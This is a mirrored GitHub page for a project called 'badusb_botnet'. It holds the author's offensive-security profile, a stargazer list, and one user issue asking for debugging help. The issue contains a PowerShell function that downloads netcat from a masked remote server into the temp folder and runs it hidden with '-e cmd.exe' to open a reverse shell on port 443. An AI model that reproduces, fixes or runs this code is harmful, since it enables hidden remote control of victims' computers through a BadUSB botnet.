Giter VIP home page Giter VIP logo

badusb_botnet's Introduction

Hi there ๐Ÿ‘‹

I am passionate about computer security aka cybersecurity, especially the offensive part ๐Ÿ˜ˆ, a few years ago I was very interested in the world of Machine Learning/Deep Learning, in short, Artificial Intelligence ๐Ÿง  and now I love to combine it with the field of cybersecurity ๐Ÿ” to create projects, investigate new algorithms ๐Ÿงฎ that can be applied in the sector or develop innovative tools ๐Ÿ› ๏ธ.

I'm currently very involved in the analysis of vulnerabilities in web applications ๐Ÿž, preparing the AWAE certification offered by Offensive-Security and hacking machines on the HackTheBox ๐ŸŸฉ platform to keep up to date on the different vulnerabilities.

Top Langs My github stats

badusb_botnet's People

Contributors

alexfrancow avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

badusb_botnet's Issues

Netcat

I can't for the life of me get the nc command to work!

I have altered the code slightly to see if I can get it running but it doesnt seem to be opening the unzipped netcat folder to run the .exe with the args?

function netcat($ip) {
    Send-Message "Downloading_netcat.."
    $url = "http://**************:8080/nc.zip"
    $outpath = "$env:temp\nc.zip"
    $outpathUnzip  = "$env:temp\nc"
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    Invoke-WebRequest -Uri $url -OutFile $outpath
    
    Start-Sleep -Seconds 5
    Expand-Archive $outpath -DestinationPath $outpathUnzip    
    $args = "$ip 443 -e cmd.exe"
    $netcat = $env:temp\nc.exe

    Start-Sleep -Seconds 5
    Send-Message "Connecting.."
    Send-Message "IP:$ip"
    Send-Message "Port:443"
    Start-Process $netcat -ArgumentList $args -WindowStyle Hidden

Is there anything obvious I have missed in the code?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.